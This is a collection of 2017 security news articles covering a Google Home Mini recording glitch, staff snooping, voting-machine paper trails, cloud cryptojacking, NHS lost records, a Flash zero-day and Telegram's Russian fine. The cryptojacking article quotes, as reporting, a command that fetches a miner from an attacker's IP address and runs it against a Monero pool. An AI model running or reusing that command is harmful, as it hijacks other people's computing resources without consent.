
Google Home Mini glitch triggers secret recordings

The privacy glitch that befell Google’s new £49 ($49) Home Mini speaker last week was small but, critics might suggest, still revealing.

The trouble started when journalist Artem Russakovskii, who had been given a review unit at the launch event on 4 October, noticed that the Mini kept turning itself on even when not commanded to.

Deciding to search for clues in the device’s logs, he got a shock:

I opened it up, and my jaw dropped. I saw thousands of items, each with a Play button and a timestamp.

The Mini, it seemed, had recorded every sound detected in its vicinity over a two-day period, no matter how inconsequential, and uploaded it all to Google. It even activated after a simple knock on the wall.

This behaviour could be disabled and the recordings deleted, but only at the expense of the system’s future voice-recognition accuracy.

What on earth was the Mini playing at?

According to Google, the device had malfunctioned because of a physical problem with the touch panel, which was designed to allow owners to activate recording without using the “OK Google” voice command.

Although this only affected review units handed out during press launches, the company decided to disable the touch feature on all Minis by way of a software update. This process started on 7 October (a day after the errant recording was brought to its attention) and was due to be completed by 15 October.

Concluded Russakovskii:

My Google Home Mini was inadvertently spying on me 24/7 due to a hardware flaw. Google nerfed all Home Minis by disabling the long-press in response, and is now looking into a long-term solution.

For most owners, the usability of the Mini (which doesn’t go on official sale until 19 October) will be unaffected by the software change.

As to the Mini’s image, that might be a bigger issue.

Although resembling a small speaker, the Mini is really a sensor that integrates into Google’s Home platform, which sends the voice commands or questions it receives to a remote server.

Although such devices activate only after detecting a wake phrase such as “OK Google”, by design they are listening all the time in expectation of it.
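
To make that distinction concrete, here is a toy sketch of the “listen always, transmit rarely” pattern. This is not Google’s code: the text frames and wake phrase below are stand-ins for what a real device does in firmware against raw audio.

# Toy model of hotword gating: input is examined continuously,
# but nothing leaves the device until the wake phrase is detected.
from collections import deque

WAKE_PHRASE = "ok google"   # stand-in for the real hotword model
PRE_ROLL = 3                # frames kept from just before the trigger

def upload_to_server(frames):
    # stand-in for the network call a real device would make
    print("uploading:", list(frames))

def listen(frames):
    buffer = deque(maxlen=PRE_ROLL)   # rolling buffer; old frames fall away
    triggered = False
    for frame in frames:
        if triggered:
            upload_to_server([frame])    # after the trigger, audio is sent
        elif WAKE_PHRASE in frame:
            triggered = True
            upload_to_server(buffer)     # ...plus the brief pre-roll
        else:
            buffer.append(frame)         # heard, held briefly, never sent

listen(["tv chatter", "knock on the wall", "ok google", "what time is it"])

In the faulty review units, the touch-panel bug in effect held that trigger open, so everything the microphone heard was sent.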

The system also relates commands to an individual user account. Google allows account holders to control this data as well as mute the Mini, but users must remember to do this. Many probably won’t.

The privacy implications of this system are obvious, even as Google plays down worries that it is just a new form of surveillance dressed up as something useful:

We take user privacy and product quality concerns very seriously. Although we only received a few reports of this issue, we want people to have complete peace of mind while using Google Home Mini.

The incident has echoes of Amazon’s troubles earlier this year, when the company found itself fending off a police request to access recordings made by its Echo speaker in connection with a murder investigation.

Google’s Mini will doubtless still sell well – this isn’t another example of the privacy arguments that helped sink Google Glass. But the last thing the company needs is to add fuel to the idea that these devices are, however inadvertently, gateways to a new era of home surveillance.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/E-27cRghtVY/

Why Security Leaders Can’t Afford to Be Just ‘Left-Brained’

The left side of the brain is logical and linear; the right side, creative. You have to use both sides of the brain to connect to your audience in your business.

Although my lifelong passion for technology has served me well, one particular lesson truly transformed my career — the acknowledgment that there are two sides of the brain: the right side, which is the source of creativity, and the left side, where technical thinking takes place.

I’ve always been technically minded — or left-brained — and wanted to understand how things work. But I also developed an appreciation for the right side of the brain, the engine of creativity. A Whole New Mind by Daniel Pink is a great read on left-brain/right-brain theory. It also supports my belief that to be an effective security leader one must learn to use both the technical and creative sides of the brain. Because when we use both sides effectively, new doors are opened.  

Two Sides Are Better Than One 
In my role at CenturyLink, I’ve been raising awareness of our cybersecurity efforts throughout the company, up to and including the boardroom. In the process, I’ve found that using the “two-brained” approach pays dividends.

Technology professionals, including those in cybersecurity, have been trained their whole lives to mostly use the left side of the brain, where most of the math, science, and logic functions occur. From the time they enter school and throughout their careers, technologists are rewarded and encouraged to use their left brain. You set a goal to build or secure a system and you achieve it through careful planning and determination. Sometimes you hit a wall, but you either find a workaround or plow through it.

However, achieving cross-organizational goals requires technical leaders to collaborate and influence senior corporate leadership, all the way up to the board of directors. Many of these senior leaders may not have a technical background, but all of them understand business. Often, technical leaders struggle in communicating with senior leadership because influencing others requires them to use the creative side of their brain.

I’ve seen this occur on several occasions when security leaders presented to a group of executives. When asked about the security gaps or risks the company faced, the security leaders gravitated to the analytic left side of the brain. In these situations, they would typically address the technologies, processes, and people required to secure the enterprise. Their response was logical, factual, and linear — classic left-brain thinking. What they failed to understand was that the executives were primarily interested in how a particular threat might affect the company’s bottom line and return on investment, or lead to additional risk.

Had these security leaders also used the right side of the brain — which is said to be strong in holistic thinking, intuition, nonverbal cues, and creative visualization — they would have been better able to relate to the executives’ perspective, and as a result better able to respond to their questions.         

It’s important to understand your audience’s points of view and the response you want to elicit from them. When presenting to your executive team, for example, knowing to focus on the threat actors and probable business effects — rather than the technologies and processes — is a more effective way of getting your security budget approved. For that reason, I regularly remind my team to always use both sides of their brain.     

Creativity Can Reveal Alternative Solutions
I’ve also encountered security professionals who are quick to say no to changes within an organization that could enable business transformation. These could be changes to existing security processes, new password rules, or the use of new tools or products. Although security is a top priority, I challenge my team daily to not just refuse but to explain why we have to say no and then seek to understand the perspectives of our audience. I encourage them to use the creative side of the brain to think about alternative solutions.

The following types of questions are often helpful in this process: What is the business driver or goal behind the desired change? Is there another way to address these needs? What additional effort would it take to close the security gap? Can we come up with a more cost-effective security control? Can we modify our rules to simplify the process without increasing risk to the company?

Members of the security team will be more effective in protecting the enterprise if they are viewed as enablers of business transformation rather than inhibitors. Security leaders must learn that many issues shouldn’t be addressed with an either/or conversation. More productive conversations are enabled by the word “and.” For example, instead of thinking “I can either defend the company or implement the requested change,” think “How can I communicate more effectively to influence others, and protect the company?”

Using the creative side of your brain will dramatically increase the chances of gaining cross-organizational buy-in. And obtaining this type of support will enable you to achieve your key goals more easily.

Bill Bradley has been with CenturyLink for 32 years. During that time he has served in a variety of technical roles with increasing responsibilities, including software developer, security manager, CTO, CIO and now as senior vice president of cyber engineering and technology …

Article source: https://www.darkreading.com/vulnerabilities---threats/why-security-leaders-cant-afford-to-be-just-left-brained/a/d-id/1330123?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

InfoSec Pros Among Worst Offenders of Employer Snooping

A majority of IT security professionals admit to trawling through company information unrelated to their work — even sensitive material.

IT security professionals often cross the ethical line when it comes to their employer, with 66% of survey respondents admitting that they seek out and access company information they don’t need to do their work, according to a survey released today.

The global survey, which queried 913 IT security professionals, found 36% of respondents were willing to take it a step further and admitted to hunting down, or accessing, sensitive company performance information that was irrelevant to their work.

And it turns out that IT security executives were the worst offenders when it came to this snooping behavior, compared with the rest of their teams, according to the Dimensional Research survey commissioned by One Identity.

When it comes to general snooping of company information that is not sensitive, 71% of IT security executives admitted to this behavior, compared with 56% of IT security workers who did not hold a managerial position, the survey found.

The percentage of IT security executives willing to track down or access sensitive company performance information was a whopping 40%, compared with 17% for IT security team members who were not in a managerial role.

“I had an IT role in the past. There is always a temptation with privileges to explore where they should not explore. But what surprised me was how pervasive it is,” says Jackson Shaw, senior director of product management for One Identity.

While the survey did not dig into the specific types of sensitive company performance information that IT executives sought, this type of information generally falls into the realm of company profits and revenue, he noted. As for other material, IT security professionals may spend time trawling through layoff lists, promotion lists, and employee salaries buried in the bowels of the human resources department, Shaw surmised.

“Most file servers at companies are not heavily locked down, and typically the IT security staff has the most privileges, so it’s entirely possible that these people know what the monitoring technology is looking at and know how not to get caught,” says Shaw.

He estimates that less than 50% of companies likely track the movements of their IT security teams and IT administrators as they move through the corporate network and other systems.

The survey also found that 92% of IT security professionals say employees at their companies attempt to access information they don’t need to do their work. Also, 44% of IT security pros working at technology companies admit to searching for sensitive company information, compared with 36% at financial services companies and 21% at healthcare companies.

Guarding the Gatekeepers
Cybersecurity ethics is a topic that some colleges, as well as workshops, address. But that training often centers on what an IT security professional should do when tracking down and dealing with hackers and cybercriminals.

However, cybersecurity professionals should be held to a higher standard when it comes to their own behavior, says Jane LeClair, president and CEO of the Washington Center for Cybersecurity Research and Development and former dean of the school of business and technology at Excelsior College in Albany, NY.

“As with any profession where sensitive information is available — medical, military, finances, etc. — those who are involved with the care and security of that information should be held to a higher standard,” LeClair says. “With the use of powerful computers, those in the IT arena have been entrusted with not only the ability to access that sensitive data but to safeguard it as well. Part of that responsibility is the intrinsic control to restrain oneself from ‘snooping’ into material that is beyond the scope of one’s normal area of activity.”

People tend to snoop out of natural curiosity and because their personal sense of accountability has not been adequately developed, LeClair explains.

Personal responsibility stems from a childhood where trust and integrity are ingrained at an early age and then continues through the maturing process that leads to adulthood, she adds, noting that people placed in positions of responsibility before they have “matured” and have developed appropriate life “filters” tend to have errors in judgment.

As for IT security executives who trawl through their employer’s data and information not tied to their work, LeClair points to a 19th-century adage attributed to Lord Acton: power tends to corrupt, and absolute power corrupts absolutely.

“Computers are, for now anyway, the ultimate instruments of information and power…. Knowledge is power,” she says. “Executives and people in positions of responsibility seek control of their situations and those that might influence their status. Acquiring knowledge beyond what is personally needed to perform an assigned job or responsibility provides data and insights that can be filed away for future use and self-promotion. The more power and information you attain, the greater your position and the more power and information you seek to maintain your status.”

Can Ethics be Trained?
While it may be human nature to snoop, the filters an individual places on their behavior can be a learned experience, LeClair says.

“Much of that comes from the upbringing you experience from childhood and carries on through schooling and into adulthood. Sadly, in seemingly increasing numbers, people are missing out on developing those filters of personal accountability and trust,” she observes.

In the past, emphasis on attaining computer skills has focused on the nuts and bolts of acquiring those skills and less on “how” those learned skills should be applied, LeClair says.

With the current shortfall of skilled IT professionals, there has been a rush to fill the pipeline with individuals to fill those vacant seats, and in many cases, it seems the rush has increasingly cut short the emphasis on ethics, she adds.

“Wherever training or education is provided, from high schools to colleges, training centers to the workplace, ethics must take a prominent place in the curriculum,” says LeClair. “In many cases, the ethics training that is received today by our cybersecurity students does not provide cases on these types of situations that would present themselves to the cyber professional.”

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s …

Article source: https://www.darkreading.com/attacks-breaches/infosec-pros-among-worst-offenders-of-employer-snooping/d/d-id/1330146?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google Bolsters Security for Select Groups

Business leaders, political campaign teams, journalists, and other high-risk groups will receive advanced email and account protection.

Google is launching an “advanced protection program” that aims to offer greater email and account protection to journalists, business leaders, political campaign teams, and other high-risk individuals who may be targeted by cyberattacks, the Alphabet company announced today.

Under the program, participants will be required to sign in to their accounts with a password and a physical security key fob, rather than using traditional two-step verification such as a password plus a code sent via SMS or generated by the Google Authenticator app.
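
By way of contrast, the code-from-an-app factor being superseded here is typically TOTP (RFC 6238), which rests entirely on a shared secret: anyone who obtains that secret can compute the same codes, as the minimal sketch below shows (the base32 secret is a made-up example).

import base64, hmac, struct, time

def totp(secret_b32, step=30, digits=6):
    # HMAC the current 30-second counter with the shared secret (RFC 6238)
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // step)
    digest = hmac.new(key, counter, "sha1").digest()
    # dynamic truncation: 4 bytes taken at an offset the digest itself picks
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))   # example secret; prints the current 6-digit code

A security key, by contrast, performs a challenge-response signature and never reveals its private key, which is part of why it makes the stronger factor.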

Users will also be given limited app access. Third-party apps, which security experts say are less secure than those in Google’s Play Store or Apple’s App Store, will automatically lose permission to access sensitive data from Google Drive files and emails. Users will need to use the Gmail app or Inbox by Gmail instead, as third-party mail apps will no longer have that access.

Account recovery will take longer and require additional steps for “advanced protection program” users, Google warns. If a user loses access to their account and both security keys, they will need to take additional verification steps that may take a “few days to restore access” to their account, Google states.

Read more about the “advanced protection program” here.

 

Article source: https://www.darkreading.com/endpoint/google-bolsters-security-for-select-groups/d/d-id/1330149?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The fix is in for hackable voting machines: use paper

Want better security of election voting results? Use paper.

With the US almost halfway between the last national election and the 2018 mid-terms, not nearly enough has been done to address the demonstrated insecurity of current electronic voting systems. Multiple experts say one obvious, fundamental move should be to ensure there is a paper trail for every vote.

That was a major recommendation at a panel discussion this past week that included representatives of the hacker conference DefCon and the Atlantic Council think tank, which concluded that while there is progress, it is slow.

The progress includes the designation of voting systems as critical infrastructure by the Department of Homeland Security, plus moves in Texas and Virginia to improve the security of their systems by using paper.

Most states already do that. But Lawrence Norden, co-author of a September 2015 report for the Brennan Center for Justice titled “America’s Voting Machines at Risk,” wrote in a blog post last May for The Atlantic that 14 states, “including some jurisdictions in Georgia, Pennsylvania, Virginia, and Texas – still use paperless electronic voting machines. These systems should be replaced as soon as possible.”

There is little debate about the porous nature of electronic voting systems – it has been reported for years. It was close to four years ago, in January 2014, that the bipartisan Presidential Commission on Election Administration (PCEA) declared:

There is an impending crisis … from the widespread wearing out of voting machines purchased a decade ago. … Jurisdictions do not have the money to purchase new machines, and legal and market constraints prevent the development of machines they would want even if they had funds.

A couple of years later the Brennan Center issued its report, which predicted that in the 2016 elections, 43 states would be using electronic voting machines that were at least 10 years old – “perilously close to the end of most systems’ expected lifespan.”

The biggest risk from that, the report said, was failures and crashes, which could lead to long lines at voting locations and lost votes. But it also said security risks were at unacceptable levels:

Virginia recently decertified a voting system used in 24 percent of precincts after finding that an external party could access the machine’s wireless features to “record voting data or inject malicious data.”

Smaller problems can also shake public confidence. Several election officials mentioned “flipped votes” on touch screen machines, where a voter touches the name of one candidate, but the machine registers it as a selection for another.

Not to mention that with solely digital voting machines, there is no way to audit the results.

While there is still no documented evidence that hostile nation states – mainly Russia – have been able to tamper directly with election results, the risk is there. At this past summer’s DefCon conference, one of the most high-profile events was the so-called Voting Village, where Wired reported that, “hundreds of hackers got to physically interact with – and compromise – actual US voting machines for the first time ever.”

The reason it hadn’t been done before, at least publicly, was that it was illegal. But at the end of 2016, an exemption to the Digital Millennium Copyright Act finally legalized hacking of voting machines for research purposes.

Not surprisingly, hackers didn’t have all that much trouble – they found multiple ways to breach the systems both physically and with remote access. And according to Jake Braun, a DefCon Voting Village organizer and University of Chicago researcher, the results undermined the claim that the decentralized voting system in the US (there are more than 8,000 jurisdictions in the 50 states) would make it more difficult to hack.

With only a handful of companies manufacturing electronic voting machines, a single compromised supply chain could impact elections across multiple states at once, he noted.

It’s not just tampering with actual voting results that can damage the credibility of an election either. Norden told Wired that, “you can do a lot less than that and do a lot of damage… If you have machines not working, or working slowly, that could create lots of problems too, preventing people from voting at all.”

Norden doesn’t dismiss the need for technology improvements. “Among the wide variety of solutions being explored or proposed are use of encryption, blockchain, and open source software,” he wrote in his blog post.

But the most effective security measure, he contended in his blog post, is low-tech:

The most important technology for enhancing security has been around for millennia: paper. Specifically, every new voting machine in the United States should have a paper record that the voter reviews, and that can be used later to check the electronic totals that are reported.

This could be a paper ballot the voter fills out before it is scanned by a machine, or a record created by the machine on which the voter makes her selections—so long as she can review that record and make changes before casting her vote.

That kind of improvement doesn’t have to take a lot of time or cost big bucks either, he said, and would create “software independent” voting systems, where an “undetected change or error in its software cannot cause an undetectable change or error in an election outcome.”
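
To illustrate why the paper record matters, here is a simplified sketch of the check an audit performs: draw a random sample of ballots and compare each paper record with what the machine recorded. Real post-election audits – risk-limiting audits in particular – use more careful statistics; the data below is invented.

import random

# Invented data: the candidate recorded for each of 1,000 ballots
electronic = ["smith", "jones", "smith", "smith", "jones"] * 200
paper = list(electronic)
paper[3] = "jones"   # one simulated tabulation error

def audit(electronic, paper, sample_size=100, seed=2018):
    # A small sample may miss a rare error; real audits enlarge the
    # sample until they reach statistical confidence in the outcome.
    rng = random.Random(seed)   # a published seed keeps the draw verifiable
    sample = rng.sample(range(len(paper)), sample_size)
    return [i for i in sample if electronic[i] != paper[i]]

discrepancies = audit(electronic, paper)
print(len(discrepancies), "discrepancies found at ballots:", discrepancies)

A risk-limiting audit keeps enlarging the sample until it is statistically confident the reported outcome is correct – something that is only possible when there is paper to sample.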

Given what are sure to be continued attempts at foreign interference in US elections, “it is the least we can do,” he said.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Wq9bJT5sSYs/

Crypto-coin miners caught toiling away in hacked cloud boxes

Here’s yet another reason to make sure you lock down your clutch of cloud services: cryptocurrency mining.

Security outfit RedLock’s security trends report [PDF], out this month, said developers and organizations are not securing their AWS, Azure and Google Cloud Platform systems, allowing miscreants to hijack them to steal processor cycles for digging up alt-coins. It’s believed hackers are able to get into boxes by using their default credentials.

RedLock says companies stung this way included security company Gemalto and insurer Aviva.

Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report stated.
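
Checking whether one of your own endpoints is open in this way is simple enough. The sketch below is a hedged example, not RedLock’s methodology: an anonymous request to a Kubernetes API server (the hostname here is a placeholder) should come back 401 or 403; a 200 listing pods means anyone on the internet gets the same view.

import json, ssl, urllib.error, urllib.request

API = "https://k8s.example.internal:6443"   # placeholder for your cluster

ctx = ssl.create_default_context()
ctx.check_hostname = False        # many clusters use self-signed certs;
ctx.verify_mode = ssl.CERT_NONE   # acceptable for a reachability probe only

try:
    with urllib.request.urlopen(API + "/api/v1/pods", context=ctx) as resp:
        pods = json.load(resp)
        print("EXPOSED: anonymous request returned",
              len(pods.get("items", [])), "pods")
except urllib.error.HTTPError as err:
    print("Rejected as expected, HTTP", err.code)   # 401/403: auth enforced
except urllib.error.URLError as err:
    print("No response:", err.reason)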

It’s one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 terawatt-hours, and it takes 215kWh for a single transaction.
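
A quick sanity check on those figures, using nothing but the numbers above:

# 21 TWh/year at 215 kWh per transaction
annual_kwh = 21e9    # 21 terawatt-hours, expressed in kWh
per_tx_kwh = 215
print(round(annual_kwh / per_tx_kwh / 1e6, 1), "million transactions/year")   # ~97.7

Call it roughly 98 million transactions’ worth a year. Electricity is a miner’s dominant cost, which is exactly why someone else’s cloud bill is such an attractive place to put it.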

However, you’d be a fool to mine Bitcoin in the cloud when newbie currency Monero is much easier to craft, and one XMR is worth about $95 right now. Most web-based miners – such as Coin Hive’s, spotted on various websites – dig up Monero cash at a rapid pace on commodity hardware.

In Aviva’s case, RedLock says the cyber-dosh miner was discovered running in a MySQL container, and it communicated back to a Gmail account. The randomized inbox hinted that someone had automated the process of locating insecure containers and setting up miners within them, and the biz reckoned that theory was supported by this Reddit post.

In that thread, a Redditor uploaded code nearly identical to the command line RedLock found running on Aviva’s server, with the same email recipient:

curl -L http://208.115.205.133:8220/minerd -o minerd; chmod 777 minerd
setsid ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

Change those credentials, people. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/17/cryptocoin_miners_turning_up_on_unprotected_cloud_instances/

NHS: Remember those patient records we didn’t deliver? Well, we found another 162,000

NHS leaders have admitted that the biggest ever loss of patient documents is worse than initially thought, as another 162,000 undelivered documents have been discovered.

The scandal was first revealed back in February, when the NHS was forced to admit that 709,000 items of correspondence – which includes details of patients’ test results, change-of-address forms and other personal information – had gone undelivered.

The error by NHS Shared Business Services (SBS) – a joint venture between Steria and the NHS – meant that between 2011 and 2016, these documents were left gathering dust in a warehouse.

A team was tasked with investigating the incident, which included assessing whether the information had adversely affected patients’ health, and it was thought that the situation was under control.

However, NHS England chief executive Simon Stevens on Monday told the Public Accounts Committee that some more undelivered records had turned up in the course of the investigation.

He said that, as part of the work, the team had looked at whether clinicians had stuck to processes introduced in 2015 that were intended to improve the transfer of NHS documents – and discovered about 5 per cent of cases “where that hasn’t been happening”.

Pressed on what this was in real numbers, Stevens said it meant there were about 150,000 more records that needed to be “repatriated” to the relevant GP practices.

On top of this, the team dealing with the incident investigated local offices across the country and found a further 12,000 SBS items languishing undelivered.

Karen Williams, the former director of transformation and corporate operations at NHS England (she now works at HMRC), said that this was because these boxes “had been assumed to be records for filing and therefore hadn’t been processed”.

Committee members were clearly exasperated by the latest admission, with chairman Meg Hillier saying that they had expected to “be beginning to wrap this up”.

“We’re very disappointed to still be discovering more problems,” she added.

Geoffrey Clifton-Brown, meanwhile, expressed dismay that the execs had “started this hearing very confidently” when discussing progress on the initial tranche.

“Then you tell us this bombshell… what’s the situation today for dealing with the backlog?”

In response, Stevens said that the team was applying the same triaging processes to the new records, which involved first making sure the relevant GPs received the records, and then having them vetted for clinically important information.

He said the NHS expected to have all the records back with GPs by the end of December for initial assessment, and that the end of March was “feasible” for finishing the whole project.

Of course, this extra work is going to cost. The government stumped up £2.5m to deal with the initial portion of documents, which is being used partly to fund GP practices that have to search through the medical records.

When pushed on the extra resources needed to deal with this final stage, Stevens said that he couldn’t put a precise number on it, but “would say in the zone of a million, rather than £2.5m”.

Stevens also detailed progress on the original 709,000 items, saying that 5,562 cases had been sent for a full clinical review, and of these 4,565 had been completed.

Some 3,624 have been clearly shown not to have caused harm, with the remaining 941 awaiting a final clinical review. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/17/nhs_finds_another_162000_unprocessed_patient_records/

Flash 0-day in the wild – patch now!

This past Patch Tuesday, Adobe released, well, nothing. Given that Adobe’s Patch Tuesday releases have been gradually diminishing over the past few months, perhaps some of us thought these Flash-related patches were going the way of the dodo.

Alas, it was wishful thinking.

Six days after Patch-Tuesday-that-wasn’t, Adobe has released an out-of-band patch for Flash in response to a zero-day vulnerability that’s being exploited in the wild.

This Flash vulnerability, CVE-2017-11292, could allow remote code execution, and is rated as Critical. It affects Flash both in browsers and on desktop players, on Windows, Mac, Linux, and Chrome OS.

Adobe notes that this vulnerability is being exploited in the wild, specifically by a criminal group that has previously used other Flash vulnerabilities to carry out their attacks.

Sophos disrupts the attack by blocking the URL that malware is downloaded from, and by detecting the malware itself as Mal/Generic-S.

Nevertheless, if you’re still using Adobe Flash, you should patch right away.

But better yet, get rid of Flash altogether (if you can).

Even Adobe knows that its beleaguered media player’s days are numbered. Browser vendors have been trying to sweep it further and further under the rug for years, and in July Adobe announced that it was finally pulling the plug.

By the end of 2020.

Given this progress, and in collaboration with several of our technology partners – including Apple, Facebook, Google, Microsoft and Mozilla – Adobe is planning to end-of-life Flash. Specifically, we will stop updating and distributing the Flash Player at the end of 2020 and encourage content creators to migrate any existing Flash content to these new open formats.

There’s another forty or so Patch Tuesdays between now and then.

Flash’s days are very numbered, but it’s having an agonising, protracted exit. For everyone’s sake its demise really can’t come soon enough. Adobe’s waiting until 2021; you don’t have to.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/MDk66PpmKfc/

Russia tweaks Telegram with tiny fine for decryption denial

Encrypted messaging app Telegram must pay 800,000 roubles for resisting the Russian FSB’s demand that it help decrypt user messages.

The fine translates to just under US$14,000, making it less of a serious punishment and more a shot across the bows.

However, it does seem to entrench the principle that the Federal Security Service of the Russian Federation (FSB) can demand decryption.

Moscow signalled its intention to crack down last year with legislation put to the Duma, proposing fines up to a million roubles for the administrative offence of not giving keys to the FSB.

Telegram’s head office received its summons in July, according to this Russian-language report from the BBC. The summons demanded information about six numbers registered on Telegram.

Judge Yulia Danilchik of the 383 Meshchansky District Court of Justice made the guilty finding and imposed the fine.

Telegram founder Pavel Durov has posted to Russian social site VK.com that it’s not possible to comply.

“In addition to the fact that the requirements of the FSB are not technically feasible, they contradict Article 23 of the Constitution of the Russian Federation: ‘Everyone has the right to privacy of correspondence, telephone conversations, postal, telegraphic and other communications,’” he wrote.
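
On the “not technically feasible” point: in an end-to-end encrypted chat, the session key is negotiated between the two devices and never exists on the server, so there is nothing for the operator to hand over. The sketch below is generic Diffie-Hellman with toy numbers, not Telegram’s MTProto, though its secret chats use a DH exchange of this general shape.

import random

# Toy Diffie-Hellman (real systems use 2048-bit groups, not p=23).
# A relay server sees only p, g and the public values A and B;
# the shared key is computed independently at each endpoint.
p, g = 23, 5

a = random.randrange(2, p - 1)   # Alice's private value, never transmitted
b = random.randrange(2, p - 1)   # Bob's private value, never transmitted

A = pow(g, a, p)   # what the server relays from Alice
B = pow(g, b, p)   # what the server relays from Bob

assert pow(B, a, p) == pow(A, b, p)   # both ends derive the same key
print("shared key:", pow(B, a, p))

Telegram’s ordinary cloud chats are encrypted client-to-server, so the calculus there is different; the “not feasible” argument applies to its end-to-end secret chats.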

He indicated his intention to appeal, and keep doing so “until the claim of the FSB is considered by a judge familiar with the basic law of Russia – its Constitution”. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/17/russia_fines_telegram/
